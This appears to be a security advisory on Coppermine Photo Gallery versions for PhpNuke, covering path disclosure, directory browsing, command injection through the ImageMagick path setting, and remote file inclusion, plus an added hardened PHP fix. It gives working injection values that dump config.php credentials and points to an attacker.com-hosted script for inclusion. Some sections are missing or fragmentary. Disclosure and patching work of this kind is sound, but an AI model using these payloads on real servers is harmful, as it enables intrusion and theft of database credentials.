I have tested two versions of Coppermine: 1.2.2b and 1.2.0 RC4, which I will refer to below as the "new version" and the "old version".
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
Many scripts in the Coppermine software package are not protected against direct access, so standard PHP error messages can be provoked which expose the full filesystem path to the scripts. This piece of information is of great value to a potential attacker, who will use it in the next steps of an attack.
Version scope: both new and old versions are affected.
This can be used by a potential attacker to steal cookies and perform other operations which, under normal conditions, are not permitted by the browser's cross-domain security restrictions.
C. Arbitrary directory browsing (needs nuke admin rights!):
PhpNuke is known for its many security bugs, which lead to the admin account being taken over by an attacker. So requiring admin rights to use this exploit is not such a big restriction...
Version scope: both new and old versions are affected.
    if ($retval) {
        $ERROR = "Error executing ImageMagick - Return value: $retval";
        if ($CONFIG['debug_mode']) {
As we can see, the very dangerous PHP function "exec()" is in use, and some user input, the variables "$src_file" and "$dest_file", is sanitized with "escapeshellarg()". All seems to be OK? Yes... oops... what about the config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc.? Coppermine's authors assumed that those variables are safe to use directly in "exec()"... But if we have nuke admin rights, we can manipulate those configuration parameters, and therefore arbitrary shell commands can be injected into "exec()"! You want details? Go to Coppermine's configuration panel and set "Method for resizing images" to "Image Magick". Next, set "Path to ImageMagick" to a value which includes the shell command you want to execute on the server. Example "path" in the case of a Windows server: "type config.php > config.txt &"; Linux server: "cat config.php > config.txt ;". Now "save new configuration", then upload some pictures to the server and go to "Batch add pictures". If all went right, you will see a "config.txt" file in the phpnuke root directory, so anyone can read critical information in plaintext: database name, username and password. Of course, a skilled attacker can within 5 minutes get a remote shell running on the server through an arbitrary port (higher than 1024), and further hacking is no longer logged, because the webserver is bypassed. One more step, finding and using a local r00t exploit, and the server is 0wned.
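The fix the passage above calls for is to treat configuration values exactly like user input before they reach the shell. The following is an added example written for this advisory, not Coppermine's own code: the function names, the "convert" binary under "$CONFIG['impath']" and the ImageMagick options used are assumptions, but the checks are the ones that defeat the injection described above.

```php
<?php
// Added example (not Coppermine's source): build the ImageMagick resize
// command so that values from the admin configuration panel are validated
// or escaped instead of being interpolated into exec() as trusted text.

function build_resize_command(array $config, string $src_file, string $dest_file, int $new_size): string
{
    // 1. "Path to ImageMagick" must point at an existing, executable "convert"
    //    binary whose path contains no shell metacharacters. A value such as
    //    "cat config.php > config.txt ;" fails every one of these tests.
    $impath = rtrim($config['impath'], '/') . '/convert';
    if (!is_file($impath) || !is_executable($impath)
        || preg_match('#[^A-Za-z0-9_./\\-]#', $impath)) {
        throw new RuntimeException('Invalid ImageMagick path in configuration');
    }

    // 2. Numeric options are cast and range-checked, so text appended to
    //    "jpeg_qual" can never become part of the command line.
    $quality = (int) $config['jpeg_qual'];
    if ($quality < 1 || $quality > 100) {
        throw new RuntimeException('jpeg_qual must be between 1 and 100');
    }
    if ($new_size < 1) {
        throw new RuntimeException('new_size must be positive');
    }

    // 3. Everything else, including the binary path itself, goes through
    //    escapeshellarg(), so uploader-chosen file names are quoted literals.
    return escapeshellarg($impath)
        . ' -quality ' . $quality
        . ' -geometry ' . $new_size . 'x' . $new_size
        . ' ' . escapeshellarg($src_file)
        . ' ' . escapeshellarg($dest_file);
}

function resize_with_imagemagick(array $config, string $src_file, string $dest_file, int $new_size): bool
{
    $cmd = build_resize_command($config, $src_file, $dest_file, $new_size);
    exec($cmd . ' 2>&1', $output, $retval);
    if ($retval !== 0) {
        // Log server-side only; echoing $output to the browser would leak
        // filesystem paths, the same problem as section A above.
        error_log('ImageMagick failed (' . $retval . '): ' . implode("\n", $output));
        return false;
    }
    return true;
}
```

Even with these checks in place, a safer design keeps the ImageMagick path out of the web-editable configuration altogether, so that admin-panel access no longer equals shell access.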
E. Remote file inclusion:
Version scope: both new and old versions are affected (different bugs in different scripts).
There exist remote file inclusion vulnerabilities in Coppermine Photo Gallery which can lead to arbitrary PHP code execution, shell command injection, etc. And as discussed before, this can ultimately lead to total compromise of the victim server.
E1 - affects the old version:
First, prepare your PHP script at "http://attacker.com/include/functions.inc.php", and then: